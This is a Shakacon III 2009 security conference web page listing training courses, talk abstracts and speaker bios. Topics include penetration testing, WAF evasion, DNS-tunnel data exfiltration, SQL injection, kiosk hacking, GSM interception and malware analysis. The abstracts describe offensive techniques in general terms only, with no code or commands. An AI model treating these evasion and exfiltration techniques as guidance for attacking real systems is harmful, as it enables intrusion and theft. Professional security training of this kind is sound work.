|
Shakacon III |
REGISTRATION |
SPEAKERS |
||||||||||||||||||||
SHAKACON 2009 TALKS NOW AVAILABLE!!!All 2009 talks have been uploaded and are now available by accessing the speaker topics on the right (Select talk title below speaker name and click "Download Talk" from pop up). Shakacon recap coming soon... All 2008 Presentations and Pictures are available here: http://www.shakacon.org/2008/Presentations.zip http://www.shakacon.org/2008/images/index.html |
SHAKACON AGENDA NOW AVAILABLE http://shakacon.org/agenda.pdf CTF RULES AND REQUIREMENTS NOW AVAILABLE http://shakacon.org/CTF_2009.txt1:11 PM 6/24/2009
Shakacon III 2-Day Conference
2009 CALL FOR PAPERS HAS ENDED!
- $99 ($103.66 with tax and $149 after May 10th) 1 Day Pre-Conferece Training Package - $499 ($522.51 with tax)
- $999 ($1046.07 with tax)
- $1399 ($1464.92 with tax and $1499 after May 10th) - FREE Shakacon III 2-Day Conference Included! Select one (1) of the following Pre-Conference Training Packages:
|
SELECTED TRAINING COURSES:
SELECTED SPEAKERS:
|

Mastery of Physical Security Overview:
Physical security is an oft-overlooked component of data and system security in the technology world. While frequently forgotten, it is no less critical than timely patches, appropriate password policies, and proper user permissions. You can have the most hardened servers and network but that doesn't make the slightest difference if someone can gain direct access to a keyboard or, worse yet, march your hardware right out the door. Those who attend this session will leave with a full awareness of how to best protect buildings and grounds from unauthorized access. Attendees will not only learn how to distinguish good locks and access control from poor ones, but will also become well-versed in picking, bypassing, access controls, electronic systems, and post-intrusion forensics... convince management that a new investment is necessary by showing them yourself how the server room door can be opened without a key in under a minute! :-) If you have your own lockpick tools, you are welcome to bring them, but this is not necessary. A set of tools will be provided to you as part of the course.
Deviant Ollam's Bio:
While paying the bills as a network engineer and security consultant, Deviant Ollam's first and strongest love has always been teaching. A graduate of the New Jersey Institute of Technology's "Science, Technology, & Society" program, he is always fascinated by the interplay that connects human values and social trends to developments in the technical world. A fanatical supporter of First Amendment rights who believes that the best way to increase security is to publicly disclose vulnerabilities, Deviant has given lockpick demonstrations at ShmooCon, DefCon, Black Hat, ToorCon, HOPE, HackCon, HackInTheBox, ShakaCon, and the United States Military Academy at West Point.
Crash Course on Penetration Testing & Web Application Security Testing with Firefox Overview:
Day 1 - Crash Course in Penetration Testing
This course will cover some of the newer aspects of penetration testing such as Open Source Intelligence Gathering with Maltego and other Open Source tools.
Advanced Scanning, Enumeration, Exploitation (remote and client-side), and Post-Exploitation relying heavily on the features included in the Metasploit Framework will also be covered.
Emphasis throughout the entire workshop will be placed on being as stealthy as possible, and dealing with popular defensive technologies such as:
Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection.
Day 2 - Web Application Penetration Testing with Firefox
There are a few commercial vulnerability scanners and penetration testing tools for the Web Application security space. There are even fewer open-source vulnerability scanners and penetration tools that serve this purpose. Firefox with its collection of security extensions and its relative ease of extension development is fast becoming a Web Application Penetration Testing platform of choice.
This workshop will focus on using Firefox as a Web Application Penetration Testing platform, developing Firefox extensions to automate common penetration testing tasks, and writing extensions to address issues that commercial tools don't.
Joe McCray's Bio:
Founder of LearnSecurityOnline.com. Rapid7 Assessment Practice manager
Dangerous Minds: The Art of Guerilla Data Mining Overview: Download Talk
The inspiration of this study is the dollar bill. More specifically the "Eye of Providence" or the "all-seeing eye" floating the back of the US dollar bill. But this presentation is not about Eyes, or the US Dollar, or the Da Vinnci code but about Knowledge and Information.
It is not a secret that in today's world, information is as valuable or maybe even more valuable that any military tool that we have out there. Information is the key. That is why the US Information Awareness Office's (IAO) motto is "scientia est potential", which means "knowledge is power". The IAO just like the CIA, FBI and others make information their business. Aside from these there are multiple military related projects like TALON,ECHELON, ADVISE, and MATRIX that are concerned with information gathering and analysis.
So now in the context of extremely witty acronyms, we would like to present the Virtual Extraction Review, Insight and Threat Analysis System or VERITAS. Unfortunately, it's not actually a system but a framework but I guess it would have to be because it would have much less impact if we called it VERITAF.
VERITAS is a combination of tools and techniques to conduct data mining for security. Think of it as threat Intelligence in a box. The idea here is to use data mining in order to analyze and gain insight on different threats. This can be used to visualize trends (e.g. security trends, worms, viruses), summarize large data sets (forums, blogs, irc), gather a high level understanding of a topic (e.g. technologies), and automatically categorize different topics for research (malware descriptions). And since it's a framework, you can actually use different tools and techniques in order to get what you need.
In this presentation I will give a high level overview of the framework, provide background on data mining, and present some cases to illustrate the approach.
Mark Ryan Talabis's Bio
Ryan is a Consultant within the Secure DNA Consulting practice. He has over eight years of experience in Information Technology (IT) security, systems analysis and design; and software and web applications development. He has extensive experience in vulnerability assessments and application penetration testing and has specialized expertise in security analysis and computer forensics. Recently, he became a founding member of the Hawaii Honeynet Project. Prior to Secure DNA Consulting, he was the lead analyst of the Philippine Honeynet Project. He was a consultant for the Asian Development Bank (ADB), a lecturer for Ateneo de Manila University and the former Director of Software Development of Slingshot Interactive, a startup internet and database consultancy firm in Manila. He has been involved in the various security analysis activities of the Honeynet Research Alliance, Leurre'Com Project, and performed Incident Handling duties for the Philippine CERT and vulnerability and penetration testing for the Asia-Pacific CERT. He is also the Community Manager for Networks and Security Section of the UNDP-APDIP International Open Source Network. He has an MS in Information Technology; Certified Information Systems Security Professional (CISSP); Certified Information Systems Auditor (CISA); a Microsoft Certified Professional (MCP); a GIAC Certified Incident Handler Certification (GCIH); a GIAC Security Essentials Certification (GSEC). He has presented in a number of conferences such as Blackhat, INFORMS, ISSA, etc. He is also very active in honeynet research and has a number of published papers to his name in various peer-reviewed journals.
The Truth about Web Application Firewalls: What the vendors do not want you to know Overview: Download Talk
Web Application Firewalls (WAFs) are quickly taking their place within the network in order to protect web applications against common security holes such as Cross Site Scripting and SQL injection. They are known by other names such as 'Deep Packet Inspection Firewalls' because they look at every request and response within the TLS, HTTP, SOAP, XML-RPC, Web Service layers. Web Application Firewalls can be either software, or hardware appliance based and are typically installed in front of a webserver in an effort to try and shield it from incoming attacks. Today WAF systems are considered the next generation product to protect websites against web hacking attacks.
During this presentation we will show in practice how the big names of Web Application Firewalls can be identified, detected and we will introduce new attacks to evade specific products. Additionally, we will show how Web Application Firewalls can be vulnerable to the same vulnerabilities that they try to protect Web Applications from.
Bonus: we will be releasing a new tool and a new exploit.
Wendel Guglielmetti Henrique and Sandro Gauci's Bio
Wendel Guglielmetti Henrique has worked with IT since 1997, during the last 7 years he has worked in the computer security field. He found vulnerabilities in many softwares like Webmail systems, Access Points, Citrix Metaframe, etc. Some tools he wrote already were used as examples in articles in national magazines like PCWorld Brazil and international ones like Hakin9 Magazine. During the past 3 years he has been working as a Penetration Tester.
Sandro Gauci is the owner and Founder of EnableSecurity
(www.enablesecurity.com) where he performs R&D and security consultancy for mid-sized companies. Sandro has over 8 years experience in the security industry and is focused on analysis of security challenges and providing solutions to such threats. His passion is vulnerability research and has previously worked together with various vendors such as Microsoft and Sun to fix security holes.
Sandro is the author of the free VoIP security scanning suite SIPVicious (sipvicious.org).
$1.7 Trillion Under Siege (or the role of penetration testing and vulnerability scanning in a really big bank): Download Talk
Taking technical security knowledge and putting it to work in a huge organizations presents many challenges. Among them, how do you communicate technical needs to non-technical people responsible for funding and other key decisions, and then deliver something useful and cost-effective? In this presentation, I plan to use the case study of the Global Vulnerability Management program in my organization to discuss the following:
i) What are we trying to do here: Just what is a global threat and vulnerability management program about? What kind of threats does a large organization face? Are they different then a smaller one?
ii) What are the problems we face: Just what kind of threats do we face? How do you get accurate threat information? how do you convey the seriousness of these issues? how do you co-coordinating resources? how do you deal with regulators and auditors?! How does a techie get his point across in a massive corporate environment?
iii) What was our approach: Technologies we bought, technologies we had to buy. Processes we had to implement and things we had to concede. Making tools do not things that they may not be advertised for. Working with different teams from different fields.
iv) Some more on tools: what's good? what's bad? how do you deal with the bad? why are there so many vendors and how come none of them make what I need?
v) Dealing with regulators and audit issues: Not the most interesting topic, and it drives you nuts, but we need to talk about it (only briefly though)
vi) The future: Where are we going with this?
Mark Stamford's Bio:
Mark's entry into the world of computers came in 1981 when his parents bought him a Sinclair ZX81 (a powerful beast with 1k or RAM). He then proceeded to become acquainted with its workings, then moved on through various machines up to the Mac that his writing this on. Along the way he watched Wargames, got interested in security and went from there. In a professional sense he has worked a couple of jobs in the security field including being the network security bod for a financial trading company, security consultant for a big 4 firm, and now works for a large financial institution heading up the Global Threat and Vulnerability Management Program (that’s a long title to have to put on a card). Where he is responsible for the security of approx 200,000 systems running on a variety of platforms and doing a variety of things.
He also enjoys music (making and listening), getting outside and enjoying nature, the occasional beer with good conversation and the fine movies of Steven Seagal.
Exploit or Exception? Overview: Download Talk
One of my former students said to me, "...the hardest part I find about the job [bug hunting primarily via fuzzers] is identifying what my exceptions are, what causes them, and rather or not they're interesting ..." It turns out this is a bit challenging, particularly if you're new to the world of reverse engineering, debugging, low level exploit development, and such. This talk will walk through examples of fuzzers finding real bugs in software like QuickTime and exploring, technically, rather the bug is "interesting" or not.
Jared DeMott's Bio:
Jared DeMott is a senior security researcher for Crucial Security Inc., frequent speaker, former teacher, and author. He is been deeply involved in the security community since his first job at NSA in 2000. Jared is probably best known for the fuzzing tool, GPF, which he released in 2005.
GSM/GPRS/UMTSsecurity and traffic interception Overview:
I will speak about telecommunications security, focused on GSM/GPRS/UMTS security, traffic interception, mobile phone forensics and anti-forensics,
phone vulnerabilities, how to secure communications, locating mobile phones, secure calls, how to create as secure scenario, (built a own gsm network and how to create a secure pbx to encrypt the calls).
I will do a live demo, sniffing the gsm traffic from different local’s operators with special hardware. The hardware I will use to sniffing the traffic has never been release to the public.
PaTa's Bio:
I’m playing and doing research with telecommunications since I was a child.
Nowadays, I’m the coordinator of the telecommunications line at Imaginarium, which is the most specialized toy retail chain in the world, with 340 shops in 28 countries. You can find more information at www.imaginarium.info.
Besides, I’m the responsible for two models of mobile phones for children.
I have been working at www.indra.es in the past
I have been speaker in some security conferences.
Foro Tecnoatlantico Caixa Nova. 2005. Oviedo. Spain Ciclo de conferencias San Alberto Magno. 2005. Murcia University. Spain 1º Congreso Internacional de Hackers. 2004. Manizales University . Colombia G-Con Three, México D.F. 2004. México D.F Undercon. 2003 Murcia. Spain G-Con Two, México D.F 2003. México D.F.
Exploiting Rich Content Overview:
As RIA (Rich Internet Application) technologies flourish onto the marketplace many wonder what impact they will have on the security landscape. Routinely iSEC Partners performs assessments of emerging technologies to better understand their risks and how to remediate these risk in live deployments. As RIA technologies advance vendors move to complex file formats as a solution to deliver rich content. With this in mind iSEC Partners performed an assessment of various file formats used by the popular RIA implementations. During the assessment of these technologies several issues were discovered in the popular technologies. At initial glance these issues may appear harmless. This presentation will demonstrate how these often considered low risk issues can be carefully exploited to have a much deeper impact. Developers should be aware of these common programming mistakes when developing complex file formats, which are especially critical in Rich Internet Applications.
Riley Hassell's Bio:
Riley Bruington Hassell is an internationally recognized security professional. He is an industry expert in the fields of application security assessment, software reverse engineering and malware analysis. Mr. Hassell discovered and disclosed of some of the most critical software vulnerabilities to date. Throughout the year 2000 and 2001 he was responsible for several critical vulnerabilities, each having major repercussions on the security industry at large. Most notably Mr. Hassell was responsible for the discovery of the first critical remote vulnerabilities in Windows 2000 and Windows XP. He also discovered the vulnerability that triggered the Code Red Internet worm. His initial dissection of the worm was used to develop and put in place protect measures to safeguard the network targeted by Code Red, the Whitehouse public network. Taking his research a step further he forecast future worm technologies and presented during presentations at the Blackhat security conference. During the year 2002 Mr. Hassell performed an assessment of the popular security products. During his assessment he discovered critical vulnerabilities in several leading security products, pushing security vendors to take a second look at their software. Mr. Hassell spent the following several years working with start up ventures to pioneer product technologies in the patch management, intrusion prevention, vulnerability analysis and malware analysis fields. Mr. Hassell is currently working with internationally renowned security assessment firm iSec Partners.
Challenge of Windows physical memory acquisition and exploitation Overview: Download Talk
In 2008, companies and governements interests for Microsoft Windows physical memory growed significantly. Acquisition was one of this challenge. Author will present a free and open-source tool he created called win32dd to acquire in various format windows physical memory.
Moreover, he will show how interoperability between exiting format can help incident response engineers, and investigators to improve their results in the extracting information process through existing free tools like Microsoft Windows Debugger.
Matthieu Suiche's Bio:
Matthieu Suiche is a security researcher who focus on reverse code engineering and volatile memory forensics. He had been speaker in various security conferences such as PacSec, BH USA, EUROPOL High Tech Crime Meeting. His previous research on Windows hibernation helped several investigators from all around the world to extract information from an undocumented microsoft file format. He is reachable through his website at http://www.msuiche.net
Microsoft patches little sister but forgets big brother Overview: Download Talk
This presentation introduces methods used by hackers/attackers to hunt
vulnerabilities in Microsoft Windows products, such as Internet Explorer and
the Windows operating system. These include reverse engineering, surfing the
Web, and diffing Microsoft modules. The presentation also covers why these
methods are innovative or significant, and includes an important tutorial.
Attackers can use these methods to hunt for zero-day exploits.
Summary of the points we plan to cover:
* Introduce past zero-day exploits
* Discuss how they were found
* Why attackers hunt for zero-days
* How a programmer's bug is a hacker's treasure
* Microsoft silently fixed vulnerabilities
* Hunting zero-days the easy way: DIFFING!
Moti Joseph's Bio:
Moti Joseph has been involved in computer security since 2000.
For the past 7 years, he has been working on reverse engineering
exploit code and developing security products. He is currently a
Senior Security Researcher with Websense Security Labs.
Packing and the Friendly Skies Overview: Download Talk
Many of us attend cons and other events which involve the transportation of computers, photography equipment, or other expensive tech in our bags. If our destination if far-flung, often air travel is involved... this almost always means being separated from our luggage for extended periods of time and entrusting its care to a litany of individuals with questionable ethics and training.
After a particularly horrible episode of baggage pilferage and tool theft, I made the decision to never again fly with an unlocked bag. However, all "TSA compliant" locks tend to be rather awful and provide little to no real security. It was for this reason that I now choose to fly with firearms at all times. Federal law allows me (in fact, it REQUIRES me) to lock my luggage with proper padlocks and does not permit any airport staffer to open my bags once they have left my possession.
In this talk, I will summarize the relevant laws and policies concerning travel with weapons. It's easier than you think, often adds little to no extra time to your schedule (indeed, it can EXPEDITE the check-in process sometimes), and is in my opinion the best way to prevent tampering and theft of bags during air travel.
Deviant Ollam's Bio:
While paying the bills as a network engineer and security consultant, Deviant Ollam's first and strongest love has always been teaching. A graduate of the New Jersey Institute of Technology's Science, Technology, & Society program, he is always fascinated by the interplay that connects human values and social trends to developments in the technical world. A fanatical supporter of First Amendment rights who believes that the best way to increase security is to publicly disclose vulnerabilities, Deviant has given lockpick demonstrations at ShmooCon, DefCon, Black Hat, ToorCon, HOPE, HackCon, HackInTheBox, and the United States Military Academy at West Point
The Art of Espionage Overview: Download Talk
We have all heard the stories about looted laptops, misplaced media, and stupid user mistakes that have lead to losses in the millions. But what about the incidents that don't get published or noticed? This upbeat presentation will discuss the role that espionage plays in today's corporate world and will introduce many new attack and defense techniques. Previously unpublished case studies, a live demonstration, and audience participation will be used to help arm the audience with the basic knowledge needed to implement a multilayered security program that will help defend against these dangerous threats.
Luke McOmie (Pyr0)'s Bio:
Luke McOmie is a Security Consultant for BT/INS. Luke helps protect and defend hundreds of the world's largest companies and organizations. He specializes in Corporate Espionage and Physical Security but is well versed in everything from Risk Analysis and Incident Response. Formerly a senior consultant at the Department of the Interior (Bureau of Communications and Technology), he managed a national CSIRT responsible for Active Threat Defense, Risk Mitigation, and Incident Response. Luke is a senior staff member (goon) at the DEFCON Security Conference (http://www.defcon.org) and also contributes to several computer security organizations including the r00tcellar Security Team, 303 and Security Tribe.
Dynamic Tracing for Exploitation and Fuzzing Overview: Download Talk
This talk will cover the use of dynamic tracing for exploitation development and fuzzing. We will show the audience how dtrace can be used to help track down bugs, visualize code coverage and gather critical information about the application. We will apply these techniques on OS X and FreeBSD giving specific examples and discussing dtrace's limitations. We will also show how a custom programmatic debugger and be created to overcome dtraces limitations. Building on previous work, we will show how dtrace can be used for fuzzing libraries and devices drivers.
Tiller Beauchamp's Bio:
Tiller Beauchamp is a principal security consultant at IOActive, where he helps provide comprehensive security services to customers around the world.
Beauchamp enjoys breaking his customers' products and then figuring out how to fix them. His latest areas of interest include application and protocol exploitation, covert channels and malware. Beauchamp has spoke at Blackhat, Defcon and Recon and holds a M.S. degree in Computer Science from the University of Oregon.
Securing With the Enemy: Social Strategy and Teams of Rivals Overview: Download Talk
While computer science is not traditionally viewed as a social science, problems in its domain are inherently social in nature - relating to people, their interactions and the relationships between them and their organizational contexts. The broad scope of the field of "security engineering" and increasing recognition that economics and psychology are integral parts of security are good examples of this, but only begin to scratch the surface. We will present this unexpected new lens and examine the two areas of economics and psychology in security, extracting insights and generalizing concepts to help attendees understand how these perspectives might be useful in their own roles.
Sarah Blankinship will introduce the perspective and explain its application in the Microsoft security ecosystem over the last few years. Sarah is a Senior Security Strategist, an 'EcoStrategist', leading the Security Ecosystem Strategy team within the Microsoft Security Response Center (MSRC) to engage security communities from around the world to research and respond to software vulnerabilities.
Jon Pincus will apply the similar perspective of social science theories to the field of static analysis as it relates to security. Jon's return to static analysis (he was architect of PREFix and PREfast from 1995-2001) provides an opportunity for unique perspective, highlighting where progress has been made, where it hasn't, and identifying remaining barriers to pervasive deployment of static analysis tools -- in particular, user interface challenges for defect understanding and work-in-context. Developments in disciplines like "gender HCI" and captology may offer paths forward. At the same time, efforts like SAMATE and Coverity's Scan are building the social infrastructure to the community as a whole to follow the lead of the security research community and incorporate an explicit ecosystem focus.
The important theme to discuss is opportunities for shared goals and cooperation from organizations and people usually seen as rivals: security researchers and software engineers, developers and security auditors, employees of bitter competitors. In many situations, well-chosen "teams of rivals" strategies -- while easy to overlook -- offer substantial benefits and positive-sum outcomes. We'll close the session by showing how to apply this approach to several timely challenges in the computer security field.
Sarah Blankinship and Jon Pincus's Bio:
Pincus' previous relevant work includes leading the Analysis and Development of Awesome STRAtegies project as General Manger for Strategy Development in Microsoft’s Online Services Group; creating the static analysis tools PREfix and PREfast (now available in Visual Studio) at my startup Intrinsa and then at Microsoft Research.
Blankinship's team, the Microsoft Security Response Center Ecosystem Strategy Team, operates at the intersection of technology and people and strives to understand how vulnerabilities affect the Internet as a whole and the collaboration is meant to advance and improve security. Sarah is an advocate of uniting people, passion and policy to address common security concerns.
Playing with Heyoka: spoofed tunnels, undetectable data exfiltration and more fun with DNS packets Overview: Download Talk
DNS Tunneling is a well known technique, and various free tools are available to play with it. However, its full power has not been fully unleashed yet: several of the existing tools are mostly targeted to read email for free from an airport lounge and not to be used as a deadly post-exploitation weapon. Also, they all suffer from the fact that a DNS tunnel is painfully slow and quite easy to detect and locate.
In this talk we will introduce a few new tricks that will allow us to:
- Improve the tunnel speed, by leveraging the fact that most DNS servers are happy to process packets that are not exactly 100% compliant to the RFCs
- Make the DNS tunnel a lot harder to detect, by spoofing the source IP address of the queries, therefore spreading the traffic signature among all the hosts of the subnet.
Of course there will be a demo, in which we will release the first official version of Heyoka, a brand new tool implementing these ideas.
Alberto Revelli and Nico Leidecker's Bio:
Alberto (aka icesurfer) lives and works in London, where he enjoys the bad weather and the astronomical cost of living. He works as a penetration tester and researcher for Portcullis Computer Security, spending most of his time breaking into web applications and into anything else that happens to tickle his curiosity. He has co-authored the OWASP Testing Guide, is a contributing author of the book "SQL Injection Attacks and Defense" (ISBN: 978-1-59749-424-3) and has developed sqlninja, an open source SQL Server exploitation toolkit (http://sqlninja.sourceforge.net)
Nico got his degree in Computer Science at the Karl-Ruprechts University of Heidelberg, Germany, with a Thesis regarding an Authority Based Extension to the ARP Protocol to prevent MITM attacks. He now works as a penetration tester for Portcullis Computer Security, and in his spare time enjoys analyzing the security of databases
(http://www.leidecker.info/downloads/Having_Fun_With_PostgreSQL.pdf) and developing various security tools (http://www.leidecker.info/projects/)
Emerging Trends in Security and Risk Management Overview: Download Talk
The evolution of Security and Risk Management has progressed considerably since the days when a “Firewall” was considered “Security”. Today’s trends involve a greater focus on Risk Management as a corporate function that extends well beyond computers and IT, and extends into the Board Room, into business operations, and is inclusive in its needs. This talk will discuss new models of governance and oversight, new roles that have been taken up by Chief Security Officers, how the process of inclusion has raised awareness and participation in the Security and Risk Management process, and how new operational models have strengthened company’s resilience.
The talk will discuss new models of governance that include stakeholders from multiple areas of the business, approaches to awareness that create higher levels of participation and success, methods to improve efficiencies in security operations, and organizational structures that include key risk management personnel in the process.
Daniel Blander's Bio:
Daniel is President of the consulting firm Techtonica,Inc. and CEO of InfoSecurityLab, Inc. He has over twenty years of experience building world-wide security organizations for international companies in the financial, technology, retail, healthcare, manufacturing, airline, and telcom industries. He has developed unique programs for achieving compliance, governance, operational efficiency, and security awareness and brings a unique perspective from his international experience and contacts. Daniel’s work resulted in his nomination in 2008 as Information Security Executive of the Year for the West by the Executive Alliance.
Sniff keystrokes with lasers/voltmeters: Side Channel Attacks Using Optical Sampling of Mechanical Energy Emissions and Power Line Leakage Overview: Download Talk
TEMPEST attacks, exploiting Electro Magnetic emissions in order to gather data,
are often mentioned by the security community, movies and wanna-be spies (or
NSA employees we guess...).
While some expensive attacks, especially the ones against CRT/LCD monitors,
have been fully researched and described, some others remain relatively unknown
and haven't been fully (publicly) researched.
Following the overwhelming success of the SatNav Traffic Channel hijacking talk
we continue with the tradition of presenting cool and cheap hardware hacking
projects.
We will explore two unconventional approaches for remotely sniffing keystrokes
on laptops and desktop computers using mechanical energy emissions and power
line leakage. The only thing you need for successful attacks are either the
electrical grid or a distant line of sight, no expensive piece of equipment is
required.
We will show in detail the two attacks and all the necessary instructions for
setting up the equipment. As usual cool gear and videos are going to be
featured in order to maximize the presentation.
Andrea Barisani & Daniele Bianco's Bio:
Andrea Barisani is a security researcher and consultant. His professional career began 8 years ago but all really started when a Commodore-64 first
arrived in his home when he was 10. Now, 17 years later, Andrea is having fun with large-scale IDS/Firewalls deployment and administration, forensic
analysis, vulnerability assessment, penetration testing, security training and his Open Source projects. He eventually found that system and security
administration are the only effective way to express his need for paranoia.
Being an active member of the international Open Source and security community he's maintainer/author of the tenshi, ftester projects as well as
the founder and project coordinator of the oCERT effort, the Open Source Computer Emergency Reponse Team.
He has been involved in the Gentoo project, being a member of the Gentoo Security and Infrastructure Teams, and the Open Source Security Testing
Methodology Manual, becoming an ISECOM Core Team member. Outside the community he has been a security consultant for Italian firms and he's now the
co-founder and Chief Security Engineer of Inverse Path Ltd.
He has been a speaker and trainer at PacSec, CanSecWest, BlackHat and DefCon conferences among many others, speaking about SatNav hacking, 0-days, LDAP and
other pretty things.
Daniele Bianco is a system administrator and IT consultant. He began his professional career as a system administrator during his early
years at university. His interest for centralized management and software integration in Open Source
environments has focused his work on design and development of suitable R&D infrastructure.
For the time being Daniele is working as a consultant for Italian astrophysics research institutes, involving support for the design, development and the
administration of IT infrastructure.
One of his hobbies has always been playing with hardware and recently he has been pointing his attention on in-car wireless and navigation systems. He's
the resident Hardware Hacker for international consultancy Inverse Path Ltd.
Daniele holds a Bachelor's degree in physics from University of Trieste.
Rage Against the Kiosk Overview: Download Talk
My name is Paul Craig, and I am the self proclaimed "King of Kiosk Hacking".
Last year at Defcon 16, I released iKAT v1.0 (The Interactive Kiosk Attack Tool). iKAT is an online tool
designed to allow users to hack an internet Windows Kiosk terminal, in less than one minute.
Thousands of Kiosks worldwide have accessed iKAT and witnessed its Kiosk hacking power.
Kiosk vendors ran for cover after the Defcon release, fixing their software and explicitly blocking iKAT and
my techniques. The year is now 2009, and I have spent my spare time playing with more Kiosks. With even
more success than ever before!
iKAT v2.0 is now ready to be released, with more oh-day, more tools and more tricks, to provide you with the
ultimate Kiosk hacking experience.
Paul Craig's Bio:
Paul Craig Paul Craig is a principal security consultant at Security-Assessment.com in Auckland New
Zealand, where he runs two teams of penetration testers out of Auckland and Wellington.
Paul is an active security researcher, published author, and a devoted hacker. Paul specializes in application
penetration testing, and has spoken at various conferences around the globe.
Paul is a passionate about security and thrives on privilege escalation and popping shells whenever
possible.
Advanced SQL Injection Overview: Download Talk
SQL Injection is a vulnerability that is often missed by web application security scanners, and it's a vulnerability that is often rated as NOT exploitable by security testers when it actually can be exploited.
Advanced SQL Injection is a presentation geared toward showing security professionals advanced exploitation techniques for situations when you must prove to the customer the extent of compromise that is possible.
The key areas are:
* IDS Evasion
* Privilege Escalation
* Re-Enabling stored procedures
* Obtaining an interactive command-shell
* Data Exfiltration via DNS
Joe McCray's Bio:
Founder of LearnSecurityOnline.com. Rapid7 Assessment Practice manager
Application Security: For Hackers and Developers (3 day) Overview:
There are four technical skills required by security researchers, software quality assurance engineers, or developers concerned about security: Source code auditing, fuzzing, reverse engineering, and exploitation. All these skills and more are covered in a new and exciting Crucial Security course developed by senior security researcher Jared DeMott. C/C++ code has been plagued by security errors resulting from memory corruption for a long time. Problematic code is discussed and searched for in lectures and labs. Web auditing is covered using WebGoat. Fuzzing is a topic book author DeMott knows about well. Mutation file fuzzing and framework definition construction (Sulley and Peach) are just some of the lecture and lab topics. When it comes to reversing C/C++ (Java and others are briefly discussed) IDA pro is the tool of choice. Deep usage of this tool is covered in lecture and lab. Exploitation discussions and labs are the final component. You’ll enjoy exploiting BSD local programs to Vista browsers using the latest techniques.
Jared DeMott's Bio:
Jared DeMott is a senior security researcher for Crucial Security, based in Chantilly, Virginia. Crucial Security provides state-of-the-art technical engineering and security services to the most elite branches of the Federal Government’s law enforcement and intelligence communities, engineering solutions to meet their demanding requirements. Mr. DeMott previously worked for the NSA and currently teaches computer engineering University classes in the evenings. He has spoken at security conferences such as Black Hat, Defcon, ToorCon, and Shakacon. This background provides an ideal blend of skills for teaching cutting edge security material, in a fun and instructive manner.
Introduction to Malware Analysis (3 day) Overview:
Security researchers are facing a growing problem in the complexity of malicious executables. While dynamic black-box automation tools exist to discover what malware will do on a given execution, it is often important for an analyst to know the full capabilities of a given malware sample. What port does it listen on? What password does it expect for backdoor access? What files will it write to? What will it do tomorrow that it didn't do today?
This class will focus on teaching attendees the steps required to understand the functionality of given malware samples. This is a hands-on course. Attendees will work on real-world malware through a series of lab exercises designed to build their expertise in understanding the analysis process.
Scott Lambert and Jason Geffner's Bio:
Scott Lambert is a Security Program Manager on the Microsoft Malware Protection Center (MMPC) team
at Microsoft. He owns advancing internal binary analysis tools in support of vulnerability analysis and
automatic signature generation.
Prior to joining Microsoft, Lambert developed, maintained and supported numerous computer security
applications ranging from Vulnerability Assessment and Risk Management software to Network and Host-
Based Intrusion Detection/Prevention Systems for companies such as L-3 Network Security, Veridian
Information Solutions, Symantec Corporation and TippingPoint, a division of 3Com. In addition, he
developed and implemented test plans for the evaluation of both wired and wireless Intrusion Detection
Systems and performed advanced protocol analysis in support of research and validation of various
computer and network vulnerabilities and attack techniques.
Jason Geffner joined Next Generation Security Software Ltd. in June of 2007 as a Principal Security
Consultant. Prior to joining NGS, Jason spent nearly three years as a Reverse Engineer on Microsoft
Corporation's Anti-Malware Team, where his work involved analyzing malware samples, deobfuscating
binaries, and writing tools for analysis and automation. Jason was the Security Research & Response
owner of the Windows Malicious Software Removal Tool (MSRT). He chose which new malware families
for the MSRT to detect and clean each month based on his analysis of the telemetry and trends of the
underground malware community. Jason authored tens of thousands of malware signatures and dozens
of malware analyses based on static and dynamic analyses of obfuscated binaries. His work on the MSRT
helped hundreds of millions of Windows users each month keep their computers safe and secure. While
at Microsoft, Jason was recognized for his reverse engineering skills and for his efforts to drive awareness
of reverse engineering practices throughout the company by being given the formal job title "Reverse
Engineer"; Jason was the only Microsoft employee with this title.
Jason graduated from Cornell University in 2004 with a Bachelor of Science in Computer Science. He
spent his summer of 2003 with Compuware Corporation where he performed full source code recovery on
malware samples and penetration-tested in-house copy-protection systems via reverse engineering.
During the summer of 2002, Jason worked for Pitney Bowes, where he reverse engineered software
security solutions and developed process-stealthing technologies.
Jason holds several patents in the fields of reverse engineering and network security. He is a Program
Committee member of the Reverse Engineering Conference (REcon) and a Program Committee member
of the International Conference on Malicious and Unwanted Software, is a regular trainer at Black Hat and
other industry conferences, is often credited in industry talks and publications, and has been actively
reverse engineering and analyzing software protection methods since 1995.
Computer Forensics (3 day) Overview:
Electronic evidence can be collected from a variety of sources. Within an organization’s network, evidence will be found in any form of technology that can be used to transmit or store data. This course was specifically designed for Shakacon III and is based off of Secure DNA’s own HELIX Forensic Reference Model.
First, we give you an in-depth overview of the legal and evidence gathering processes that you should be adhering to and covers why you should be establishing guidelines for your organization, what team member roles should be established and when you should be utilizing forensic techniques. Next, a practical application of open-source tools will show you the essential information that should be captured from a live network analysis. We’ll be covering various file systems and how they store their data showing you numerous artifacts that can be gathered and beneficial to your investigation. Finally, we’ll cover how to preserve the evidence allowing you to archive and further analyze the data offline.
All audiences will gain legal knowledge from this course and the hands-on practical exercises are tailored at an intermediate level to allow for a variety of individuals to benefit from the course material. Students are required to provide a laptop computer for their personal use.
Ryan Wentzel's Bio:
Ryan Wentzel is currently a Senior Consultant within the Secure DNA Consulting Practice. Prior to Secure DNA, he was a law enforcement officer cross ordained as a federal agent assigned to a Hi-Tech Crimes Task Force where he investigated hundreds of technology related cases and provided expert courtroom testimony on numerous occasions. He has specialized expertise in Computer Forensics and E-Discovery and is currently Hawaii’s only publicly documented EnCase Certified Examiner. Ryan has given numerous presentations on various technology topics and recently founded Secure DNA’s Forensic Training Division which provides computer forensic training to local individuals and organizations.
Crash Course on Penetration Testing & Web Application Security Testing with Firefox (2 day) Overview:
Day 1 - Crash Course in Penetration Testing
This course will cover some of the newer aspects of penetration testing such as Open Source Intelligence Gathering with Maltego and other Open Source tools.
Advanced Scanning, Enumeration, Exploitation (remote and client-side), and Post-Exploitation relying heavily on the features included in the Metasploit Framework will also be covered.
Emphasis throughout the entire workshop will be placed on being as stealthy as possible, and dealing with popular defensive technologies such as:
- Network Intrusion Detection/Prevention Systems
- Host-Based Intrusion Detection/Prevention Systems
- Web Application Firewalls
- Anti-Virus
- Content-Filtering Proxies
Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection.
Day 2 - Web Application Penetration Testing with Firefox
